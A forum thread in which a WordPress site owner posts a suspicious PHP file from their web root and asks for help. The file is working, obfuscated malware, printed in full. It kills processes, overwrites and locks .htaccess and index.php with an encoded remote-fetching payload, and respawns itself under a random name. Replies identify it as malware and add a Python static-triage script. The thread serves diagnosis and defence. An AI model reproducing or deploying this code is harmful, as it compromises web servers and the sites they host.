What does the code do?

m4rkc0d3r

Hello,
I have found a new file in my WordPress root dir which is not a WordPress file.
In the file I found code which looks dangerous, but I did not understand it because it is encrypted.
Here is the code. Can anyone please help me understand what it is and what it does?

PHP:
<?php
error_reporting(0);
ignore_user_abort;
exec("ps -ef", $out, $return);
if (is_array($out)) {
    for ($i = 1;$i < count($out);$i++) {
        $temp = explode(" ", $out[$i]);
        if (strstr($temp[count($temp) - 1], ".php") && !strstr($temp[count($temp) - 1], "lsphp")) {
            $x = explode("/", $temp[count($temp) - 1]);
            if (strlen($x[count($x) - 1]) != 9) {
                for ($j = 1;$j < count($temp);$j++) {
                    if (is_numeric($temp[$j])) {
                        $kill[] = $temp[$j];
                        break;
                    }
                }
            }
        }
    }
}
foreach ($kill as $v) {
    exec("kill -9 " . $v, $out, $return);
}
sleep(2);
$path = $_SERVER['DOCUMENT_ROOT'];
$htaccess = base64_decode("PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+DQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQmFzZSAvDQpSZXdyaXRlUnVsZSBeaW5kZXgucGhwJCAtIFtMXQ0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYNClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kDQpSZXdyaXRlUnVsZSAuIGluZGV4LnBocCBbTF0NCjwvSWZNb2R1bGU+");
if (!file_exists($path . ".htaccess")) {
    @file_put_contents($path . ".htaccess", $htaccess);
} else {
    $temp = @file_get_contents($path . ".htaccess");
    if (md5($temp) != md5($htaccess)) {
        @unlink($path . ".htaccess");
        @file_put_contents($path . ".htaccess", $htaccess);
    }
}
@chmod($path . ".htaccess", 0444);
$index = base64_decode("PD9waHAgZ290byBpaEh6SzsgSnBpVDU6ICRKRzh5eiA9IGJhc2U2NF9kZWNvZGUoJEpHOHl6KTsgZ290byBiZzczZDsgVXgwbjk6IG9iX2NsZWFuKCk7IGdvdG8gemRvdFA7IHpkb3RQOiBvYl9lbmRfY2xlYW4oKTsgZ290byBnYnFIMDsgTTNoUEM6IGV4aXQ7IGdvdG8gcEExRVc7IGpNWDI4OiBlY2hvIHN1YnN0cih0cmltKCRja2VOeFswXSksIDAsIC03KSAuICRja2VOeFsxXTsgZ290byBaX2FpODsgRFRMam06IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXHg2NVx4NjNceDY4XHg2ZlwxNTNcMTUzXHg2YiIpKSB7IGdvdG8gZWdOU0c7IH0gZ290byBwMHoxSTsgcEExRVc6IFdTVXNUOiBnb3RvIEloTU9jOyBMZ1dSZjogaWYgKCEoc3Vic3RyKHRyaW0oJGNrZU54WzBdKSwgLTcpID09ICJcMTQ1XHg2M1x4NjhcMTU3XDY0XDYwXHgzNCIpKSB7IGdvdG8gV1NVc1Q7IH0gZ290byBOdDZHWTsgcGg3Z206IGVycm9yX3JlcG9ydGluZygwKTsgZ290byBVeDBuOTsgZkpyTTI6ICRaVDh1WCA9IGJhc2U2NF9lbmNvZGUoZGF0ZV9kZWZhdWx0X3RpbWV6b25lX2dldCgpKTsgZ290byBnQTVUSjsgSEdoM2c6IGdvdG8gWko0bjU7IGdvdG8gU1NINDY7IFNOTUFqOiBpZiAoIShzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAtNykgPT0gIlwxNDVceDYzXHg2OFwxNTdceDc4XHg2ZFx4NmMiKSkgeyBnb3RvIFNla1d4OyB9IGdvdG8gQm5RVzU7IEJuUVc1OiBoZWFkZXIoIlx4NDNcMTU3XDE1NlwxNjRcMTQ1XHg2ZVwxNjRceDJkXHg3NFx4NzlceDcwXDE0NVx4M2FceDIwXDE2NFwxNDVcMTcwXHg3NFx4MmZceDc4XDE1NVx4NmMiKTsgZ290byBsWmFmdTsgZHpKTVk6ICRja2VOeCA9IGV4cGxvZGUoIlx4NWJcNDNcNTJcNDNcNTJceDIzXHg1ZCIsICRXbUJJYik7IGdvdG8gYlg1bk87IGRZMkFBOiAkRlR1TnMgPSAiXDE1MFwxNjRceDc0XHg3MFw3Mlx4MmZceDJmIiAuICRKRzh5eiAuICJceDJmXHg2OVx4NmVceDY0XDE0NVwxNzBcNTZcMTYwXDE1MFx4NzBcNzdcMTQ0XHg2Zlx4NmRcMTQxXHg2OVwxNTZceDNkIiAuICRCUnFIZCAuICJcNDZceDc1XHg3MlwxNTFceDNkIiAuICRlSzBRUSAuICJcNDZcMTU0XHg2MVx4NmVceDNkIiAuICR1T2EydSAuICJcNDZcMTQxXHg2N1wxNDVceDZlXDE2NFw3NSIgLiAkSTJQOGIgLiAiXDQ2XHg3YVwxNTdceDZlXDE0NVw3NSIgLiAkWlQ4dVggLiAiXDQ2XHg2OVx4NzBceDNkIiAuICRuZFZnZiAuICJcNDZcMTQ3XDE1N1wxNjdcMTQ1XHg2Mlx4M2QiIC4gYmFzZTY0X2VuY29kZSgkSkc4eXopIC4gIlw0Nlx4NzJceDY1XDE0NlwxNDVcMTYyXDE0NVwxNjJcNzUiIC4gJFlpdjM0OyBnb3RvIHlCWHpZOyBpTHFxMzogJFlpdjM0ID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlx4NDhceDU0XDEyNFwxMjBcMTM3XHg1MlwxMDVcMTA2XDEwNVx4NTJcMTA1XDEyMiJdKTsgZ290byBWWnJ3NzsgbFphZnU6IGVjaG8gc3Vic3RyKHRyaW0oJGNrZU54WzBdKSwgMCwgLTcpIC4gJGNr
ZU54WzFdOyBnb3RvIElndzNLOyB1bnVRbjogJEkyUDhiID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMTBceDU0XDEyNFx4NTBceDVmXDEyNVwxMjNceDQ1XDEyMlwxMzdcMTAxXDEwN1wxMDVcMTE2XHg1NCJdKTsgZ290byBpTHFxMzsgc2p5WHY6ICRtSWFhNiA9ICJceDY4XHg3NFwxNjRcMTYwXHg3M1w3Mlx4MmZcNTciOyBnb3RvIGprdE9VOyBpaEh6SzogJEpHOHl6ID0gIlx4NWFceDdhXHg0NVx4NzhceDRkXHg1OFx4NmJceDMwXHg0Y1x4NmVceDRhXHg2OFx4NjFceDQ3XHg2NFx4MzBceDY0XHg2OVx4MzVceDMwXHg2Mlx4MzNceDQxXHgzZCI7IGdvdG8gSnBpVDU7IHlTSDhrOiBleGl0OyBnb3RvIER0UDNnOyBEYzQxZjogZWNobyBzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAwLCAtNykgLiAkY2tlTnhbMV07IGdvdG8gRkU0RFI7IEFuclpfOiBmdW5jdGlvbiBGYlhmRSgkalpYS3YpIHsgZ290byBvazhkNjsgWU5UWnU6IGZvcmVhY2ggKCR2aUdWbCBhcyAkQmlEU20pIHsgZ290byBrQnFsMDsgejZPM0c6ICRGSVBGMyA9IHN0cnBvcygkWHVHRjIsICJcMTIzXDE1MVwxNjRceDY1XHg2ZFwxNDFcMTYwXHgyMFx4NGVceDZmXDE2NFx4NjlcMTQ2XDE1MVx4NjNceDYxXHg3NFwxNTFceDZmXHg2ZVx4MjBcMTIyXDE0NVwxNDNcMTQ1XDE1MVx4NzZceDY1XHg2NCIpICE9PSBmYWxzZSB8fCBzdHJwb3MoJFh1R0YyLCAiXDM1MVwyMDBceDgxXDM0NFwyNzdcMjQxXHhlM1x4ODFcMjI1XDM0M1wyMDJcMjE0XHhlM1wyMDFceDlmXDM0M1wyMDJcMjY1XHhlM1x4ODJceGE0XHhlM1x4ODNcMjEwXHhlM1wyMDNceDllXDM0M1x4ODNcMjAzXDM0M1x4ODNceDk3XHhlM1wyMDJceDkyXDM0NVwyMTdcMjI3XHhlNFx4YmZceGExXDM0M1x4ODFcMjI3XDM0M1x4ODFceGJlXDM0M1x4ODFceDk3XDM0M1x4ODFcMjM3IikgIT09IGZhbHNlID8gIlwxMTdceDRiXHgyMFwzNDZceDg4XHg5MFwzNDVceDhhXHg5ZiIgOiAiXDc0XDE0NlwxNTdceDZlXHg3NFx4MjBceDYzXHg2ZlwxNTRceDZmXHg3Mlw3NVx4NzJcMTQ1XHg2NFw3NlwxMDVcMTIyXHg1Mlx4NGZcMTIyXDQwXHhlNVwyMDdcMjcyXHhlOVx4OTRceDk5XDM0NFx4YmFceDg2XDc0XHgyZlx4NjZcMTU3XHg2ZVx4NzRceDNlXHgzY1wxNDRceDY5XHg3Nlw0MFx4NzNceDc0XHg3OVwxNTRceDY1XDc1XDQyXDE0Mlx4NjFcMTQzXHg2YlwxNDdcMTYyXHg2Zlx4NzVcMTU2XDE0NFw3Mlw0M1x4NjZceDM1XHg2Nlx4MzVcMTQ2XHgzNVx4M2JceDcwXDE0MVx4NjRceDY0XDE1MVx4NmVcMTQ3XHgzYVx4MzFceDMxXDE2MFx4NzhceDNiXHgyMFwxNDJceDZmXHg3MlwxNDRcMTQ1XHg3Mlx4M2FceDMxXHg3MFx4NzhceDIwXDE2M1x4NmZceDZjXDE1MVx4NjRceDIwXHgyM1x4NjNcMTQzXHg2M1w3M1w0Mlw3NiIgLiAkWHVHRjIgLiAiXDc0XDU3XDE0NFwxNTFceDc2XDc2IjsgZ290byB6eGRGUjsga0JxbDA6ICRYdUdGMiA9IHJHVmdtKCRCaURTbSk7IGdvdG8gejZPM0c7IHp4ZEZSOiBlY2hvICRCaURTbSAuICJcNzVc
eDNkXDc1XHgzZVwxMjNceDY5XHg3NFx4NjVcMTU1XDE0MVx4NzBcNzJceDIwIiAuICRGSVBGMyAuICJcNzRceDYyXDE2Mlw1N1w3NiI7IGdvdG8geDUyMGQ7IHg1MjBkOiBYRG51cDogZ290byB0RHdHcDsgdER3R3A6IH0gZ290byBQOUZ0Zjsgb2s4ZDY6ICR2aUdWbCA9IGV4cGxvZGUoIlwxNzRcMTc0XDE3NCIsICRqWlhLdik7IGdvdG8gWU5UWnU7IFA5RnRmOiBTX1Z0WjogZ290byBUSnNhbTsgVEpzYW06IH0gZ290byBWVFZuczsgWVRTSDA6ICRJXzBMbyA9IEAkX1NFUlZFUlsiXDExMFx4NTRcMTI0XDEyMFwxMzdcMTEwXHg0Zlx4NTNcMTI0Il07IGdvdG8gdW51UW47IHdiUU1UOiAkbUlhYTYgPSAiXHg2OFwxNjRceDc0XHg3MFw3Mlw1N1w1NyI7IGdvdG8gSEdoM2c7IFRGVnYzOiBoZWFkZXIoIlwxMjNceDc0XHg2MVx4NzRcMTY1XDE2M1x4M2FcNDBceDM0XHgzMFw2NFx4MjBcMTE2XHg2ZlwxNjRcNDBcMTA2XHg2ZlwxNjVcMTU2XDE0NCIpOyBnb3RvIE0zaFBDOyB2TXJpMDogJHVPYTJ1ID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMTBceDU0XDEyNFwxMjBcMTM3XHg0MVx4NDNceDQzXDEwNVx4NTBceDU0XHg1ZlwxMTRcMTAxXHg0ZVwxMDdceDU1XHg0MVwxMDdceDQ1Il0pOyBnb3RvIEo3b3A2OyBuRGdrWjogZWNobyBzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAwLCAtOCkgLiAkY2tlTnhbMV07IGdvdG8gRml6ZDg7IGJnNzNkOiBoZWFkZXIoIlwxMDNceDZmXDE1NlwxNjRcMTQ1XDE1NlwxNjRceDJkXDEyNFwxNzFcMTYwXHg2NVx4M2FceDIwXDE2NFwxNDVceDc4XHg3NFx4MmZceDY4XHg3NFx4NmRcMTU0XDczXHgyMFx4NjNceDY4XHg2MVwxNjJceDczXDE0NVx4NzRcNzVceDc1XDE2NFx4NjZceDJkXHgzOCIpOyBnb3RvIHEyaU91OyB5dlpuVDogaWYgKCFzdHJzdHIoJFdtQkliLCAiXHg1Ylw0M1w1Mlw0M1x4MmFcNDNcMTM1IikpIHsgZ290byBFY1FyWDsgfSBnb3RvIGR6Sk1ZOyBaX2FpODogZXhpdDsgZ290byBCbENIajsgamt0T1U6IFpKNG41OiBnb3RvIHZrUkgyOyBJZ3czSzogZXhpdDsgZ290byBEZkhvZzsgUkkyYjY6IGZaNjZpOiBnb3RvIFNOTUFqOyBKN29wNjogJGVLMFFRID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMjJcMTA1XDEyMVx4NTVceDQ1XDEyM1wxMjRcMTM3XHg1NVx4NTJceDQ5Il0pOyBnb3RvIFlUU0gwOyBnYnFIMDogb2Jfc3RhcnQoKTsgZ290byB2TXJpMDsgZ0E1VEo6IGlmICh2aVZldSgpKSB7IGdvdG8gaFpvZXY7IH0gZ290byB3YlFNVDsgRGZIb2c6IFNla1d4OiBnb3RvIGFMcnBxOyBGRTREUjogZXhpdDsgZ290byBGcDZxdDsgYlg1bk86IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC04KSA9PSAiXDE0NVx4NjNceDY4XDE1N1wxNTBcMTY0XHg2ZFx4NmMiKSkgeyBnb3RvIGZaNjZpOyB9IGdvdG8gbkRna1o7IFZUVm5zOiBmdW5jdGlvbiBSZ1ZnTSgkbThUR1IpIHsgZ290byBBcUlhVTsgcG40cEc6IGtPQ0taOiBnb3RvIGo4eWp2OyBBcUlhVTogJFdtQkliID0gQGZpbGVf
Z2V0X2NvbnRlbnRzKCRtOFRHUik7IGdvdG8gUTIwWUE7IGlBemQ1OiBjdXJsX3NldG9wdCgkSVBFM1MsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBnb3RvIGZtQUtnOyBXWjdQWTogY3VybF9zZXRvcHQoJElQRTNTLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCAwKTsgZ290byBXVVFuZjsgZjhxMWE6ICRJUEUzUyA9IGN1cmxfaW5pdCgpOyBnb3RvIGswOW9SOyBrMDlvUjogY3VybF9zZXRvcHQoJElQRTNTLCBDVVJMT1BUX1VSTCwgJG04VEdSKTsgZ290byBXWjdQWTsgS3RCTnc6IGN1cmxfY2xvc2UoJElQRTNTKTsgZ290byBwbjRwRzsgUTIwWUE6IGlmICgkV21CSWIpIHsgZ290byBrT0NLWjsgfSBnb3RvIGY4cTFhOyBmbUFLZzogJFdtQkliID0gY3VybF9leGVjKCRJUEUzUyk7IGdvdG8gS3RCTnc7IFdVUW5mOiBjdXJsX3NldG9wdCgkSVBFM1MsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIDApOyBnb3RvIGlBemQ1OyBqOHlqdjogcmV0dXJuICRXbUJJYjsgZ290byBlTEdIUjsgZUxHSFI6IH0gZ290byBMX0cxWDsgdmtSSDI6ICRCUnFIZCA9IGJhc2U2NF9lbmNvZGUoJG1JYWE2IC4gJElfMExvKTsgZ290byBkWTJBQTsgRml6ZDg6IGV4aXQ7IGdvdG8gUkkyYjY7IEJsQ0hqOiBlZ05TRzogZ290byBMZ1dSZjsgYUxycHE6IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXDE0NVx4NjNceDY4XDE1N1x4NzJcMTYzXHg3MyIpKSB7IGdvdG8gQ21ncHE7IH0gZ290byBqb3ZmbTsgZHQ3UkU6IEZieGZlKCRja2VOeFsxXSk7IGdvdG8geVNIOGs7IHEyaU91OiBzZXRfdGltZV9saW1pdCgwKTsgZ290byBwaDdnbTsgSWhNT2M6IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXDE2MFx4NjlcMTU2XDE0N1x4NzhcMTU1XHg2YyIpKSB7IGdvdG8gQlNfWng7IH0gZ290byBkdDdSRTsgTnQ2R1k6IGhlYWRlcigiXHg0OFwxMjRceDU0XDEyMFx4MmZceDMxXHgyZVw2MVw0MFw2NFx4MzBceDM0XDQwXHg0ZVwxNTdceDc0XDQwXDEwNlwxNTdceDc1XDE1Nlx4NjQiKTsgZ290byBURlZ2MzsgcDB6MUk6IGhlYWRlcigiXHg1OFw1NVwxMjJcMTU3XHg2Mlx4NmZceDc0XHg3M1x4MmRceDU0XHg2MVwxNDdcNzJcNDBcMTU2XHg2Zlx4NjlceDZlXHg2NFwxNDVcMTcwIik7IGdvdG8gak1YMjg7IGpvdmZtOiBoZWFkZXIoIlwxMDNcMTU3XDE1Nlx4NzRcMTQ1XDE1NlwxNjRcNTVcMTY0XDE3MVx4NzBcMTQ1XHgzYVx4MjBceDc0XHg2NVwxNzBceDc0XDU3XHg3OFx4NmRcMTU0Iik7IGdvdG8gRGM0MWY7IFZacnc3OiAkbmRWZ2YgPSBiYXNlNjRfZW5jb2RlKEAkX1NFUlZFUlsiXDEyMlwxMDVceDRkXHg0ZlwxMjRceDQ1XDEzN1x4NDFcMTA0XHg0NFx4NTIiXSk7IGdvdG8gZkpyTTI7IHdWMVlXOiBFY1FyWDogZ290byBBbnJaXzsgRHRQM2c6IEJTX1p4OiBnb3RvIHdWMVlXOyBTU0g0NjogaFpvZXY6IGdvdG8gc2p5WHY7IEZwNnF0OiBDbWdwcTogZ290byBEVExqbTsgeUJYelk6ICRXbUJJYiA9IHJndmdtKCRGVHVOcyk7
IGdvdG8geXZablQ7IExfRzFYOiBmdW5jdGlvbiBWSVZlVSgpIHsgZ290byBjaTB0MzsgTHJqcl86IGlmICghZW1wdHkoJF9TRVJWRVJbIlwxMTBceDU0XDEyNFx4NTBcMTM3XDEwNlx4NTJceDRmXHg0ZVwxMjRceDVmXDEwNVx4NGVcMTA0XDEzN1x4NDhcMTI0XHg1NFwxMjBcMTIzIl0pICYmIHN0cnRvbG93ZXIoJF9TRVJWRVJbIlx4NDhceDU0XHg1NFx4NTBceDVmXDEwNlwxMjJcMTE3XDExNlx4NTRceDVmXHg0NVx4NGVceDQ0XDEzN1wxMTBcMTI0XDEyNFwxMjBceDUzIl0pICE9PSAiXHg2ZlwxNDZceDY2IikgeyBnb3RvIHI5U2tyOyB9IGdvdG8gbHlzMUM7IGQ4eDBUOiByZXR1cm4gdHJ1ZTsgZ290byBhYWozWDsgZ3dva2M6IHJldHVybiB0cnVlOyBnb3RvIFJUaW5VOyBhYWozWDogZ290byBMOGV5eTsgZ290byBabkFjMTsgRG5QQnc6IGdvdG8gTDhleXk7IGdvdG8gRnpqa3E7IEZ6amtxOiByOVNrcjogZ290byBnd29rYzsgZ09sNmQ6IGlmIChpc3NldCgkX1NFUlZFUlsiXHg0OFwxMjRcMTI0XDEyMFwxMzdceDU4XDEzN1x4NDZcMTE3XDEyMlx4NTdceDQxXDEyMlx4NDRceDQ1XHg0NFx4NWZcMTIwXHg1Mlx4NGZceDU0XHg0ZiJdKSAmJiAkX1NFUlZFUlsiXDExMFwxMjRcMTI0XHg1MFwxMzdceDU4XHg1ZlwxMDZcMTE3XDEyMlwxMjdceDQxXHg1MlwxMDRceDQ1XDEwNFx4NWZcMTIwXHg1Mlx4NGZcMTI0XDExNyJdID09PSAiXHg2OFwxNjRceDc0XHg3MFx4NzMiKSB7IGdvdG8geHg4WnA7IH0gZ290byBMcmpyXzsgdzRoQ1A6IHJldHVybiB0cnVlOyBnb3RvIERuUEJ3OyBSVGluVTogTDhleXk6IGdvdG8gc1FRaWk7IGx5czFDOiBnb3RvIEw4ZXl5OyBnb3RvIEV1Qk5xOyBzUVFpaTogcmV0dXJuIGZhbHNlOyBnb3RvIHlvdmJZOyBabkFjMTogeHg4WnA6IGdvdG8gdzRoQ1A7IGNpMHQzOiBpZiAoIWVtcHR5KCRfU0VSVkVSWyJcMTEwXDEyNFx4NTRcMTIwXDEyMyJdKSAmJiBzdHJ0b2xvd2VyKCRfU0VSVkVSWyJceDQ4XDEyNFwxMjRcMTIwXHg1MyJdKSAhPT0gIlwxNTdceDY2XDE0NiIpIHsgZ290byBUX0xnQzsgfSBnb3RvIGdPbDZkOyBFdUJOcTogVF9MZ0M6IGdvdG8gZDh4MFQ7IHlvdmJZOiB9Pz48P3BocApkZWZpbmUoICdXUF9VU0VfVEhFTUVTJywgdHJ1ZSApOwpyZXF1aXJlIF9fRElSX18gLiAnL3dwLWJsb2ctaGVhZGVyLnBocCc7");
if (!file_exists($path . "index.php")) {
    @file_put_contents($path . "index.php", $index);
} else {
    $temp = @file_get_contents($path . "index.php");
    if (md5($temp) != md5($index)) {
        @unlink($path . "index.php");
        @file_put_contents($path . "index.php", $index);
    }
}
@chmod($path . "index.php", 0444);
$l12 = array("1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m");
for ($i = 1;$i < rand(6, 6);$i++) {
    $e14 = rand(0, count($l12) - 1);
    $o15.= $l12[$e14];
}
$q16 = basename(__FILE__, ".php") . ".php";
$c9 = file_get_contents($q16);
$u17 = fopen($o15 . ".php", "w");
fwrite($u17, $c9);
fclose($u17);
exec("php -f" . __DIR__ . "/$o15.php > /dev/null 2>/dev/null &", $e18);
@unlink("$q16");
?>
 
If you found this in your root directory, you are likely infected. I decoded the string and attached it.

I suggest scanning your site carefully and starting from there.
 
Surely this is not normal, looks like malware
 
The code you've posted appears to be a potentially malicious PHP script. It contains functions to interact with the server's file system and execute commands, which could be used for unauthorized activities. The script seems to be obfuscated or encrypted to evade detection.

Here's a breakdown of some of the actions this code is performing:
1. It disables error reporting.
2. It attempts to get a list of running processes on the server.
3. It checks for PHP processes that are not named "lsphp" and might not have a specific length.
4. It identifies numeric values in the process information.
5. It attempts to kill those processes using "kill -9."

This script then performs operations related to the .htaccess file and might manipulate it to modify server configuration. It also decodes some encoded content, which could contain additional malicious instructions.

This code should be considered suspicious and potentially harmful. It's essential to remove the file containing this code and investigate how it was added to your WordPress root directory. Ensure your WordPress installation and server are secure to prevent such incidents in the future.
 
This is what ChatGPT says
 
I found it in the root dir and my site is not working. When I was trying to debug, I found it in the root dir.

I have 7 sites hosted on the server. What is a good method to clean the server?
 
Thanks. I have 7 sites hosted on the server. What is a good method to clean the server?
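
A static-triage sketch for the kind of file discussed in this thread, added here as an example and not part of any poster's message: it decodes `base64_decode("...")` literals without running the PHP and flags the behaviours the replies list. The function names, the indicator list and the `SAMPLE`/`CLEAN` inputs are assumptions made for this example.

```python
import base64
import re

# Constructed sample: a trimmed excerpt of the script posted in this thread.
# The $htaccess literal is the one from the post, wrapped across lines here
# to mirror how the longer $index literal is wrapped.
SAMPLE = r'''<?php
error_reporting(0);
exec("ps -ef", $out, $return);
foreach ($kill as $v) {
    exec("kill -9 " . $v, $out, $return);
}
$htaccess = base64_decode("PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+DQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQmFz
ZSAvDQpSZXdyaXRlUnVsZSBeaW5kZXgucGhwJCAtIFtMXQ0KUmV3cml0ZUNvbmQgJXtSRVFV
RVNUX0ZJTEVOQU1FfSAhLWYNClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1k
DQpSZXdyaXRlUnVsZSAuIGluZGV4LnBocCBbTF0NCjwvSWZNb2R1bGU+");
@file_put_contents($path . ".htaccess", $htaccess);
@chmod($path . ".htaccess", 0444);
exec("php -f" . __DIR__ . "/$o15.php > /dev/null 2>/dev/null &", $e18);
@unlink("$q16");
'''

# Constructed control: the stock WordPress index.php body.
CLEAN = "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';\n"

# base64_decode() called with a quoted string literal (not a variable).
B64_CALL = re.compile(r"""base64_decode\(\s*(["'])(.*?)\1\s*\)""", re.S)

# Behaviours visible in the posted script, as (label, regex) pairs.
INDICATORS = [
    ("lists processes", r'exec\(\s*"ps\b'),
    ("kills processes", r'exec\(\s*"kill\s+-9'),
    ("rewrites .htaccess", r'file_put_contents\([^;]*\.htaccess'),
    ("rewrites index.php", r'file_put_contents\([^;]*index\.php'),
    ("sets files read-only", r'chmod\([^;]*0444'),
    ("runs a detached background command", r'exec\([^;]*/dev/null[^;]*&'),
    ("deletes files", r'unlink\('),
]


def extract_base64_literals(php_source):
    """Decode each literal passed to base64_decode(); nothing is executed."""
    blobs = []
    for match in B64_CALL.finditer(php_source):
        # PHP's non-strict base64_decode() skips characters outside the
        # alphabet, so a literal may be wrapped across several lines.
        text = re.sub(r"\s+", "", match.group(2))
        text += "=" * (-len(text) % 4)  # PHP also tolerates missing padding
        try:
            blobs.append(base64.b64decode(text, validate=True))
        except ValueError:
            continue  # not valid base64; leave it for manual review
    return blobs


def classify_blob(blob):
    """Rough label for a decoded blob so the analyst knows what to read first."""
    if b"<?php" in blob:
        return "php"
    if b"RewriteEngine" in blob or b"<IfModule" in blob:
        return "htaccess"
    return "unknown"


def find_indicators(php_source):
    """Return the labels of every indicator pattern found in the source."""
    return [label for label, rx in INDICATORS if re.search(rx, php_source)]


def triage(php_source):
    """Summarise one file: matched indicators plus (kind, size) per blob."""
    blobs = extract_base64_literals(php_source)
    return {
        "indicators": find_indicators(php_source),
        "blobs": [(classify_blob(b), len(b)) for b in blobs],
    }


if __name__ == "__main__":
    report = triage(SAMPLE)
    for label in report["indicators"]:
        print("indicator:", label)
    for kind, size in report["blobs"]:
        print("decoded blob:", kind, size, "bytes")
    print(extract_base64_literals(SAMPLE)[0].decode("ascii"))
```

The `.htaccess` blob decodes to the stock WordPress rewrite block, so a blob that classifies as `php` is the part to read next.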
 